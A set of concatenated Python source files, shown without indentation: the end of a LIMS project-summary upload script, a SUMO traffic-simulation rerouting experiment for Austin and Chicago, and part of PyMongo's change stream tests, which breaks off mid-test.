mainlims = Lims(BASEURI, USERNAME, PASSWORD)
lims_db = get_session()
mainlog = logging.getLogger('psullogger')
mainlog.setLevel(level=logging.INFO)
mfh = logging.handlers.RotatingFileHandler(options.logfile, maxBytes=209715200, backupCount=5)
mft = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
mfh.setFormatter(mft)
mainlog.addHandler(mfh)
# try getting orderportal config
oconf = None
if not options.old:
try:
with open(options.oconf, 'r') as ocf:
oconf = yaml.load(ocf)['order_portal']
except Exception as e:
mainlog.warn("Loading orderportal config {} failed due to {}, so order information "\
"for project will not be updated".format(options.oconf, e))
if options.project_name:
if options.old:
proj = mainlims.get_projects(name = options.project_name)
if not proj:
mainlog.warn('No project named {man_name} in Lims'.format(
man_name = options.project_name))
P = PSUL(proj[0], samp_db, proj_db, options.upload, options.project_name, output_f, mainlog)
P.handle_project()
else:
host=get_configuration()['url']
pj_id=lims_db.query(DBProject.luid).filter(DBProject.name == options.project_name).scalar()
if not pj_id:
pj_id=options.project_name
P = ProjectSQL(lims_db, mainlog, pj_id, host, couch, oconf)
if options.upload:
P.save(update_modification_time=not options.no_new_modification_time)
else:
if output_f is not None:
with open(output_f, 'w') as f:
pprint(P.obj, stream=f)
else:
pprint(P.obj)
else :
projects=create_projects_list(options, lims_db, mainlims, mainlog)
masterProcess(options,projects, mainlims, mainlog, oconf)
lims_db.commit()
lims_db.close()
def create_projects_list(options, db_session,lims, log):
projects=[]
if options.all_projects:
if options.hours:
postgres_string="{} hours".format(options.hours)
project_ids=get_last_modified_projectids(db_session, postgres_string)
if options.old:
projects=lims.get_projects()
valid_projects=[Project(lims, id=x) for x in project_ids]
log.info("project list : {0}".format(" ".join([p.id for p in valid_projects])))
else:
valid_projects=db_session.query(DBProject).filter(DBProject.luid.in_(project_ids)).all()
log.info("project list : {0}".format(" ".join([p.luid for p in valid_projects])))
return valid_projects
else:
if options.old:
projects=lims.get_projects()
log.info("project list : {0}".format(" ".join([p.id for p in projects])))
else:
projects = db_session.query(DBProject).all()
log.info("project list : {0}".format(" ".join([p.luid for p in projects])))
return projects
elif options.input:
with open(options.input, "r") as input_file:
for pname in input_file:
try:
projects.append(lims.get_projects(name=pname.rstrip())[0] )
except IndexError:
pass
return projects
def processPSUL(options, queue, logqueue, oconf=None):
couch = load_couch_server(options.conf)
proj_db = couch['projects']
samp_db = couch['samples']
mylims = Lims(BASEURI, USERNAME, PASSWORD)
db_session=get_session()
work=True
procName=mp.current_process().name
proclog=logging.getLogger(procName)
proclog.setLevel(level=logging.INFO)
mfh = QueueHandler(logqueue)
mft = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
mfh.setFormatter(mft)
proclog.addHandler(mfh)
try:
time.sleep(int(procname[8:]))
except:
time.sleep(1)
while work:
#grabs project from queue
try:
projname = queue.get(block=True, timeout=3)
proclog.info("Starting work on {} ".format(projname))
proclog.info("Approximately {} projects left in queue".format(queue.qsize()))
except Queue.Empty:
work=False
proclog.info("exiting gracefully")
break
except NotImplementedError:
#qsize failed, no big deal
pass
else:
#locks the project : cannot be updated more than once.
lockfile=os.path.join(options.lockdir, projname)
if not os.path.exists(lockfile):
try:
open(lockfile,'w').close()
except:
proclog.error("cannot create lockfile {}".format(lockfile))
if options.old:
try:
proj=mylims.get_projects(name=projname)[0]
P = PSUL(proj, samp_db, proj_db, options.upload, options.project_name, options.output_f, proclog)
P.handle_project()
except :
error=sys.exc_info()
stack=traceback.extract_tb(error[2])
proclog.error("{0}:{1}\n{2}".format(error[0], error[1], formatStack(stack)))
else:
try:
pj_id=db_session.query(DBProject.luid).filter(DBProject.name == projname).scalar()
host=get_configuration()['url']
P = ProjectSQL(db_session, proclog, pj_id, host, couch, oconf)
P.save()
except :
error=sys.exc_info()
stack=traceback.extract_tb(error[2])
proclog.error("{0}:{1}\n{2}".format(error[0], error[1], formatStack(stack)))
try:
os.remove(lockfile)
except:
proclog.error("cannot remove lockfile {}".format(lockfile))
else:
proclog.info("project {} is locked, skipping.".format(projname))
#signals to queue job is done
queue.task_done()
db_session.commit()
db_session.close()
def masterProcess(options,projectList, mainlims, logger, oconf=None):
projectsQueue=mp.JoinableQueue()
logQueue=mp.Queue()
childs=[]
#Initial step : order projects by sample number:
logger.info("ordering the project list")
orderedprojectlist=sorted(projectList, key=lambda x: (mainlims.get_sample_number(projectname=x.name)), reverse=True)
logger.info("done ordering the project list")
#spawn a pool of processes, and pass them queue instance
for i in range(options.processes):
p = mp.Process(target=processPSUL, args=(options,projectsQueue, logQueue, oconf))
p.start()
childs.append(p)
#populate queue with data
for proj in orderedprojectlist:
projectsQueue.put(proj.name)
#wait on the queue until everything has been processed
notDone=True
while notDone:
try:
log=logQueue.get(False)
logger.handle(log)
except Queue.Empty:
if not stillRunning(childs):
notDone=False
break
def stillRunning(processList):
ret=False
for p in processList:
if p.is_alive():
ret=True
return ret
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
if __name__ == '__main__':
usage = "Usage: python project_summary_upload_LIMS.py [options]"
parser = OptionParser(usage=usage)
parser.add_option("-p", "--project", dest = "project_name", default = None,
help = "eg: M.Uhlen_13_01. Dont use with -a flagg.")
parser.add_option("-a", "--all_projects", dest = "all_projects", action =
"store_true", default = False, help = ("Upload all Lims ",
"projects into couchDB. Don't use with -f flagg."))
parser.add_option("-c", "--conf", dest = "conf", default = os.path.join(
os.environ['HOME'],'opt/config/post_process.yaml'), help =
"Config file. Default: ~/opt/config/post_process.yaml")
parser.add_option("--oconf", dest = "oconf", default = os.path.join(
os.environ['HOME'],'.ngi_config/orderportal_cred.yaml'),
help = "Orderportal config file. Default: ~/.ngi_config/orderportal_cred.yaml")
parser.add_option("--no_upload", dest = "upload", default = True, action =
"store_false", help = ("Use this tag if project objects ",
"should not be uploaded, but printed to output_f, or to ",
"stdout"))
parser.add_option("--output_f", dest = "output_f", help = ("Output file",
" that will be used only if --no_upload tag is used"), default=None)
parser.add_option("-m", "--multiprocs", type='int', dest = "processes", default = 4,
help = "How many processes will be spawned. Will only work with -a")
parser.add_option("-l", "--logfile", dest = "logfile", help = ("log file",
" that will be used. default is $HOME/lims2db_projects.log "), default=os.path.expanduser("~/lims2db_projects.log"))
parser.add_option("--lockdir", dest = "lockdir", help = ("directory handling the lock files",
" to avoid multiple updating of one project. default is $HOME/psul_locks "), default=os.path.expanduser("~/psul_locks"))
parser.add_option("-j", "--hours", dest = "hours",type='int', help = ("only handle projects modified in the last X hours"), default=None)
parser.add_option("-k", "--control", dest = "control", action="store_true", help = ("only perform a dry-run"), default=False)
parser.add_option("-i", "--input", dest = "input", help = ("path to the input file containing projects to update"), default=None)
parser.add_option("--old", dest = "old", help = ("use the old version of psul, via the API"), action="store_true", default=False)
parser.add_option("--no_new_modification_time", action="store_true", help=("This updates documents without changing the modification"
" time. Slightly dangerous, but useful e.g. when all projects would be updated. Does not work together with '--old'"))
(options, args) = parser.parse_args()
main(options)
|
generic_its.py
|
#!/usr/bin/env python
from __future__ import division
import subprocess
import os
import logging
import sys
import tempfile
import math
import random
import time
import numpy as np
import json
import warnings
import multiprocessing as mp
from k_shortest_paths import k_shortest_paths
from optparse import OptionParser
import sumo_mannager
import graph_mannager
#import log_mannager
import traffic_mannager
import traci
import time
import inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
from timewindow.contextual import Contextual
def iterate_metrics(all_metrics):
traffic, crimes, crashes = [], [], []
for metrics in all_metrics:
traffic.append(metrics['traffic'])
crimes.append(metrics['crimes'])
crashes.append(metrics['crashes'])
return traffic, crimes, crashes
def create_output_file(total_count, success_count, error_count, traffic, crimes, crashes, iterate, config, city, day):
traffic_ms = (np.mean(traffic), np.std(traffic))
crimes_ms = (np.mean(crimes), np.std(crimes))
crashes_ms = (np.mean(crashes), np.std(crashes))
metrics = {}
metrics['total_count'] = total_count
metrics['success_count'] = success_count
metrics['error_count'] = error_count
metrics['out_traffic'] = traffic
metrics['out_crimes'] = crimes
metrics['out_crashes'] = crashes
metrics['traffic'] = {'mean': traffic_ms[0], 'std': traffic_ms[1]}
metrics['crimes'] = {'mean': crimes_ms[0], 'std': crimes_ms[1]}
metrics['crashes'] = {'mean': crashes_ms[0], 'std': crashes_ms[1]}
with open('../output/data/{0}/{1}/{2}/{3}_metrics.json'.format(day, city, config, iterate), "w") as write_file:
json.dump(metrics, write_file, indent=4)
def run(network, begin, end, interval, route_log, replication, p, iterate, indx_config, config, city, day):
logging.debug("Building road graph")
road_network_graph = graph_mannager.build_road_graph(network)
error_count, total_count = 0, 0
logging.debug("Reading contextual data")
contextual = Contextual(city=city, day=day)
logging.debug("Running simulation now")
step = 1
# The time at which the first re-routing will happen
# The time at which a cycle for collecting travel time measurements begins
travel_time_cycle_begin = interval
road_map = {}
all_metrics = []
start_time = time.time()
while step == 1 or traci.simulation.getMinExpectedNumber() > 0:
#logging.debug("Minimum expected number of vehicles: %d" % traci.simulation.getMinExpectedNumber())
traci.simulationStep()
#logging.debug("Simulation time %d" % step)
if step >= travel_time_cycle_begin and travel_time_cycle_begin <= end and step%interval == 0:
road_network_graph = traffic_mannager.update_context_on_roads(road_network_graph, contextual, step, indx_config, road_map)
logging.debug("Updating travel time on roads at simulation time %d" % step)
error_count, total_count, acumulated_context = traffic_mannager.reroute_vehicles(road_network_graph, p, error_count, total_count, indx_config, road_map)
all_metrics += acumulated_context
step += 1
traffic, crimes, crashes = iterate_metrics(all_metrics)
create_output_file(total_count, total_count - error_count, error_count, traffic, crimes, crashes, iterate, config, city, day)
final_time = time.time()
print('########### TIME: ', float(final_time - start_time))
#time.sleep(10)
logging.debug("Simulation finished")
traci.close()
sys.stdout.flush()
#time.sleep(10)
def start_simulation(sumo, scenario, network, begin, end, interval, output, summary, route_log, replication, p, iterate, indx_config, config, city, day):
logging.debug("Finding unused port")
unused_port_lock = sumo_mannager.UnusedPortLock()
unused_port_lock.__enter__()
remote_port = sumo_mannager.find_unused_port()
logging.debug("Port %d was found" % remote_port)
logging.debug("Starting SUMO as a server")
sumo = subprocess.Popen([sumo, "-W", "-c", scenario, "--tripinfo-output", output, "--device.emissions.probability", "1.0", "--summary-output", summary,"--remote-port", str(remote_port)], stdout=sys.stdout, stderr=sys.stderr)
unused_port_lock.release()
try:
traci.init(remote_port)
run(network, begin, end, interval, route_log, replication, float(p), iterate, indx_config, config, city, day)
except Exception, e:
logging.exception("Something bad happened")
finally:
logging.exception("Terminating SUMO")
sumo_mannager.terminate_sumo(sumo)
unused_port_lock.__exit__()
def parallel_main_loop(city, iterate, config, day, indx_config):
pred_list = {}
parser = OptionParser()
parser.add_option("-c", "--command", dest="command", default="sumo", help="The command used to run SUMO [default: %default]", metavar="COMMAND")
parser.add_option("-s", "--scenario", dest="scenario", default="../scenario/cfgs/{0}_{1}.sumo.cfg".format(city, iterate), help="A SUMO configuration file [default: %default]", metavar="FILE")
parser.add_option("-n", "--network", dest="network", default="../scenario/{0}.net.xml".format(city), help="A SUMO network definition file [default: %default]", metavar="FILE")
parser.add_option("-b", "--begin", dest="begin", type="int", default=1500, action="store", help="The simulation time (s) at which the re-routing begins [default: %default]", metavar="BEGIN")
parser.add_option("-e", "--end", dest="end", type="int", default=7000, action="store", help="The simulation time (s) at which the re-routing ends [default: %default]", metavar="END")
parser.add_option("-i", "--interval", dest="interval", type="int", default=250, action="store", help="The interval (s) of classification [default: %default]", metavar="INTERVAL")
parser.add_option("-o", "--output", dest="output", default="../output/data/{0}/{1}/{2}/{3}_reroute.xml".format(day, city, config, iterate), help="The XML file at which the output must be written [default: %default]", metavar="FILE")
parser.add_option("-l", "--logfile", dest="logfile", default="sumo-launchd.log", help="log messages to logfile [default: %default]", metavar="FILE")
parser.add_option("-m", "--summary", dest="summary", default="../output/data/{0}/{1}/{2}/{3}_summary.xml".format(day, city, config, iterate), help="The XML file at which the summary output must be written [default: %default]", metavar="FILE")
parser.add_option("-r", "--route-log", dest="route_log", default="../output/data/{0}/{1}/{2}/{3}_route-log.txt".format(day, city, config, iterate), help="Log of the entire route of each vehicle [default: %default]", metavar="FILE")
parser.add_option("-t", "--replication", dest="replication", default="1", help="number of replications [default: %default]", metavar="REPLICATION")
parser.add_option("-p", "--percentage", dest="percentage", default="1", help="percentage of improvement on safety [default: %default]", metavar="REPLICATION")
(options, args) = parser.parse_args()
logging.basicConfig(filename=options.logfile, level=logging.DEBUG)
logging.debug("Logging to %s" % options.logfile)
if args:
logging.warning("Superfluous command line arguments: \"%s\"" % " ".join(args))
start_simulation(options.command, options.scenario, options.network, options.begin,
options.end, options.interval, options.output, options.summary, options.route_log,
options.replication, options.percentage, iterate, indx_config, config, city, day)
#if os.path.exists('sumo-launchd.log'):
# os.remove('sumo-launchd.log')
def main():
# Option handling
for day in ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']:
for city in ['austin', 'chicago']:
if not os.path.exists('../output/data'):
os.makedirs('../output/data')
if not os.path.exists('../output/data/{0}/{1}'.format(day, city)):
os.makedirs('../output/data/{0}/{1}'.format(day, city))
for indx_config, config in enumerate(['traffic', 'crimes', 'crashes', 'same', 'mtraffic', 'mcrimes', 'mcrashes', 'maxtraffic', 'maxcrimes', 'maxcrashes', 'baseline']):
if not os.path.exists('../output/data/{0}/{1}/{2}'.format(day, city, config)):
os.makedirs('../output/data/{0}/{1}/{2}'.format(day, city, config))
processes = [mp.Process(target=parallel_main_loop, args=(city, iterate, config, day, indx_config)) for iterate in range(20)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
if __name__ == "__main__":
warnings.simplefilter("ignore")
main()
|
test_change_stream.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the change_stream module."""
import random
import os
import re
import sys
import string
import threading
import time
import uuid
from itertools import product
sys.path[0:0] = ['']
from bson import ObjectId, SON, Timestamp, encode, json_util
from bson.binary import (ALL_UUID_REPRESENTATIONS,
Binary,
STANDARD,
PYTHON_LEGACY)
from bson.py3compat import iteritems
from bson.raw_bson import DEFAULT_RAW_BSON_OPTIONS, RawBSONDocument
from pymongo import MongoClient
from pymongo.change_stream import _NON_RESUMABLE_GETMORE_ERRORS
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (InvalidOperation, OperationFailure,
ServerSelectionTimeoutError)
from pymongo.message import _CursorAddress
from pymongo.read_concern import ReadConcern
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.utils import (
EventListener, WhiteListEventListener, rs_or_single_client, wait_until)
class TestChangeStreamBase(IntegrationTest):
def change_stream_with_client(self, client, *args, **kwargs):
"""Create a change stream using the given client and return it."""
raise NotImplementedError
def change_stream(self, *args, **kwargs):
"""Create a change stream using the default client and return it."""
return self.change_stream_with_client(self.client, *args, **kwargs)
def client_with_listener(self, *commands):
"""Return a client with a WhiteListEventListener."""
listener = WhiteListEventListener(*commands)
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
return client, listener
def watched_collection(self, *args, **kwargs):
"""Return a collection that is watched by self.change_stream()."""
# Construct a unique collection for each test.
collname = '.'.join(self.id().rsplit('.', 2)[1:])
return self.db.get_collection(collname, *args, **kwargs)
def generate_invalidate_event(self, change_stream):
"""Cause a change stream invalidate event."""
raise NotImplementedError
def generate_unique_collnames(self, numcolls):
"""Generate numcolls collection names unique to a test."""
collnames = []
for idx in range(1, numcolls + 1):
collnames.append(self.id() + '_' + str(idx))
return collnames
def get_resume_token(self, invalidate=False):
"""Get a resume token to use for starting a change stream."""
# Ensure targeted collection exists before starting.
coll = self.watched_collection(write_concern=WriteConcern('majority'))
coll.insert_one({})
if invalidate:
with self.change_stream(
[{'$match': {'operationType': 'invalidate'}}]) as cs:
if isinstance(cs._target, MongoClient):
self.skipTest(
"cluster-level change streams cannot be invalidated")
self.generate_invalidate_event(cs)
return cs.next()['_id']
else:
with self.change_stream() as cs:
coll.insert_one({'data': 1})
return cs.next()['_id']
def get_start_at_operation_time(self):
"""Get an operationTime. Advances the operation clock beyond the most
recently returned timestamp."""
optime = self.client.admin.command("ping")["operationTime"]
return Timestamp(optime.time, optime.inc + 1)
def insert_one_and_check(self, change_stream, doc):
"""Insert a document and check that it shows up in the change stream."""
raise NotImplementedError
def kill_change_stream_cursor(self, change_stream):
"""Cause a cursor not found error on the next getMore."""
cursor = change_stream._cursor
address = _CursorAddress(cursor.address, cursor._CommandCursor__ns)
client = self.watched_collection().database.client
client._close_cursor_now(cursor.cursor_id, address)
class APITestsMixin(object):
def test_watch(self):
with self.change_stream(
[{'$project': {'foo': 0}}], full_document='updateLookup',
max_await_time_ms=1000, batch_size=100) as change_stream:
self.assertEqual([{'$project': {'foo': 0}}],
change_stream._pipeline)
self.assertEqual('updateLookup', change_stream._full_document)
self.assertIsNone(change_stream.resume_token)
self.assertEqual(1000, change_stream._max_await_time_ms)
self.assertEqual(100, change_stream._batch_size)
self.assertIsInstance(change_stream._cursor, CommandCursor)
self.assertEqual(
1000, change_stream._cursor._CommandCursor__max_await_time_ms)
self.watched_collection(
write_concern=WriteConcern("majority")).insert_one({})
_ = change_stream.next()
resume_token = change_stream.resume_token
with self.assertRaises(TypeError):
self.change_stream(pipeline={})
with self.assertRaises(TypeError):
self.change_stream(full_document={})
# No Error.
with self.change_stream(resume_after=resume_token):
pass
def test_try_next(self):
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
coll.insert_one({})
self.addCleanup(coll.drop)
with self.change_stream(max_await_time_ms=250) as stream:
self.assertIsNone(stream.try_next()) # No changes initially.
coll.insert_one({}) # Generate a change.
# On sharded clusters, even majority-committed changes only show
# up once an event that sorts after it shows up on the other
# shard. So, we wait on try_next to eventually return changes.
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
def test_try_next_runs_one_getmore(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
with self.change_stream_with_client(
client, max_await_time_ms=250) as stream:
self.assertEqual(listener.started_command_names(), ["aggregate"])
listener.results.clear()
# Confirm that only a single getMore is run even when no documents
# are returned.
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
# Get at least one change before resuming.
coll.insert_one({'_id': 2})
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
listener.results.clear()
# Cause the next request to initiate the resume process.
self.kill_change_stream_cursor(stream)
listener.results.clear()
# The sequence should be:
# - getMore, fail
# - resume with aggregate command
# - no results, return immediately without another getMore
self.assertIsNone(stream.try_next())
self.assertEqual(
listener.started_command_names(), ["getMore", "aggregate"])
listener.results.clear()
# Stream still works after a resume.
coll.insert_one({'_id': 3})
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
self.assertEqual(set(listener.started_command_names()),
set(["getMore"]))
self.assertIsNone(stream.try_next())
def test_batch_size_is_honored(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
# Expected batchSize.
expected = {'batchSize': 23}
with self.change_stream_with_client(
client, max_await_time_ms=250, batch_size=23) as stream:
# Confirm that batchSize is honored for initial batch.
cmd = listener.results['started'][0].command
self.assertEqual(cmd['cursor'], expected)
listener.results.clear()
# Confirm that batchSize is honored by getMores.
self.assertIsNone(stream.try_next())
cmd = listener.results['started'][0].command
key = next(iter(expected))
self.assertEqual(expected[key], cmd[key])
# $changeStream.startAtOperationTime was added in 4.0.0.
@client_context.require_version_min(4, 0, 0)
def test_start_at_operation_time(self):
optime = self.get_start_at_operation_time()
coll = self.watched_collection(
write_concern=WriteConcern("majority"))
ndocs = 3
coll.insert_many([{"data": i} for i in range(ndocs)])
with self.change_stream(start_at_operation_time=optime) as cs:
for i in range(ndocs):
cs.next()
def _test_full_pipeline(self, expected_cs_stage):
client, listener = self.client_with_listener("aggregate")
results = listener.results
with self.change_stream_with_client(
client, [{'$project': {'foo': 0}}]) as _:
pass
self.assertEqual(1, len(results['started']))
command = results['started'][0]
self.assertEqual('aggregate', command.command_name)
self.assertEqual([
{'$changeStream': expected_cs_stage},
{'$project': {'foo': 0}}],
command.command['pipeline'])
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
self._test_full_pipeline({})
def test_iteration(self):
with self.change_stream(batch_size=2) as change_stream:
num_inserted = 10
self.watched_collection().insert_many(
[{} for _ in range(num_inserted)])
inserts_received = 0
for change in change_stream:
self.assertEqual(change['operationType'], 'insert')
inserts_received += 1
if inserts_received == num_inserted:
break
self._test_invalidate_stops_iteration(change_stream)
def _test_next_blocks(self, change_stream):
inserted_doc = {'_id': ObjectId()}
changes = []
t = threading.Thread(
target=lambda: changes.append(change_stream.next()))
t.start()
# Sleep for a bit to prove that the call to next() blocks.
time.sleep(1)
self.assertTrue(t.is_alive())
self.assertFalse(changes)
self.watched_collection().insert_one(inserted_doc)
# Join with large timeout to give the server time to return the change,
# in particular for shard clusters.
t.join(30)
self.assertFalse(t.is_alive())
self.assertEqual(1, len(changes))
self.assertEqual(changes[0]['operationType'], 'insert')
self.assertEqual(changes[0]['fullDocument'], inserted_doc)
def test_next_blocks(self):
"""Test that next blocks until a change is readable"""
# Use a short await time to speed up the test.
with self.change_stream(max_await_time_ms=250) as change_stream:
self._test_next_blocks(change_stream)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.watched_collection().aggregate(
[{'$changeStream': {}}], maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_concurrent_close(self):
"""Ensure a ChangeStream can be closed from another thread."""
# Use a short await time to speed up the test.
with self.change_stream(max_await_time_ms=250) as change_stream:
def iterate_cursor():
for _ in change_stream:
pass
t = threading.Thread(target=iterate_cursor)
t.start()
self.watched_collection().insert_one({})
time.sleep(1)
change_stream.close()
t.join(3)
self.assertFalse(t.is_alive())
def test_unknown_full_document(self):
"""Must rely on the server to raise an error on unknown fullDocument.
"""
try:
with self.change_stream(full_document='notValidatedByPyMongo'):
pass
except OperationFailure:
pass
def test_change_operations(self):
"""Test each operation type."""
expected_ns = {'db': self.watched_collection().database.name,
'coll': self.watched_collection().name}
with self.change_stream() as change_stream:
# Insert.
inserted_doc = {'_id': ObjectId(), 'foo': 'bar'}
self.watched_collection().insert_one(inserted_doc)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Update.
update_spec = {'$set': {'new': 1}, '$unset': {'foo': 1}}
self.watched_collection().update_one(inserted_doc, update_spec)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'update')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
self.assertEqual({'updatedFields': {'new': 1},
'removedFields': ['foo']},
change['updateDescription'])
# Replace.
self.watched_collection().replace_one({'new': 1}, {'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'replace')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Delete.
self.watched_collection().delete_one({'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'delete')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
# Invalidate.
self._test_get_invalidate_event(change_stream)
@client_context.require_version_min(4, 1, 1)
def test_start_after(self):
resume_token = self.get_resume_token(invalidate=True)
# resume_after cannot resume after invalidate.
with self.assertRaises(OperationFailure):
self.change_stream(resume_after=resume_token)
# start_after can resume after invalidate.
with self.change_stream(start_after=resume_token) as change_stream:
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_with_changes(self):
resume_token = self.get_resume_token(invalidate=True)
with self.change_stream(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.watched_collection().insert_one({'_id': 3})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 3})
@client_context.require_no_mongos # Remove after SERVER-41196
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_without_changes(self):
resume_token = self.get_resume_token(invalidate=True)
with self.change_stream(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
class ProseSpecTestsMixin(object):
def _client_with_listener(self, *commands):
listener = WhiteListEventListener(*commands)
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
return client, listener
def _populate_and_exhaust_change_stream(self, change_stream, batch_size=3):
self.watched_collection().insert_many(
[{"data": k} for k in range(batch_size)])
for _ in range(batch_size):
change = next(change_stream)
return change
def _get_expected_resume_token_legacy(self, stream,
listener, previous_change=None):
"""Predicts what the resume token should currently be for server
versions that don't support postBatchResumeToken. Assumes the stream
has never returned any changes if previous_change is None."""
if previous_change is None:
agg_cmd = listener.results['started'][0]
stage = agg_cmd.command["pipeline"][0]["$changeStream"]
return stage.get("resumeAfter") or stage.get("startAfter")
return previous_change['_id']
def _get_expected_resume_token(self, stream, listener,
previous_change=None):
"""Predicts what the resume token should currently be for server
versions that support postBatchResumeToken. Assumes the stream has
never returned any changes if previous_change is None. Assumes
listener is a WhiteListEventListener that listens for aggregate and
getMore commands."""
if previous_change is None or stream._cursor._has_next():
return self._get_expected_resume_token_legacy(
stream, listener, previous_change)
response = listener.results['succeeded'][-1].reply
return response['cursor']['postBatchResumeToken']
def _test_raises_error_on_missing_id(self, expected_exception):
"""ChangeStream will raise an exception if the server response is
missing the resume token.
"""
with self.change_stream([{'$project': {'_id': 0}}]) as change_stream:
self.watched_collection().insert_one({})
with self.assertRaises(expected_exception):
next(change_stream)
# The cursor should now be closed.
with self.assertRaises(StopIteration):
next(change_stream)
def _test_update_resume_token(self, expected_rt_getter):
"""ChangeStream must continuously track the last seen resumeToken."""
client, listener = self._client_with_listener("aggregate", "getMore")
coll = self.watched_collection(write_concern=WriteConcern('majority'))
with self.change_stream_with_client(client) as change_stream:
self.assertEqual(
change_stream.resume_token,
expected_rt_getter(change_stream, listener))
for _ in range(3):
coll.insert_one({})
change = next(change_stream)
self.assertEqual(
change_stream.resume_token,
expected_rt_getter(change_stream, listener, change))
# Prose test no. 1
@client_context.require_version_min(4, 0, 7)
def test_update_resume_token(self):
self._test_update_resume_token(self._get_expected_resume_token)
# Prose test no. 1
@client_context.require_version_max(4, 0, 7)
def test_update_resume_token_legacy(self):
self._test_update_resume_token(self._get_expected_resume_token_legacy)
# Prose test no. 2
@client_context.require_version_min(4, 1, 8)
def test_raises_error_on_missing_id_418plus(self):
# Server returns an error on 4.1.8+
self._test_raises_error_on_missing_id(OperationFailure)
# Prose test no. 2
@client_context.require_version_max(4, 1, 8)
def test_raises_error_on_missing_id_418minus(self):
# PyMongo raises an error
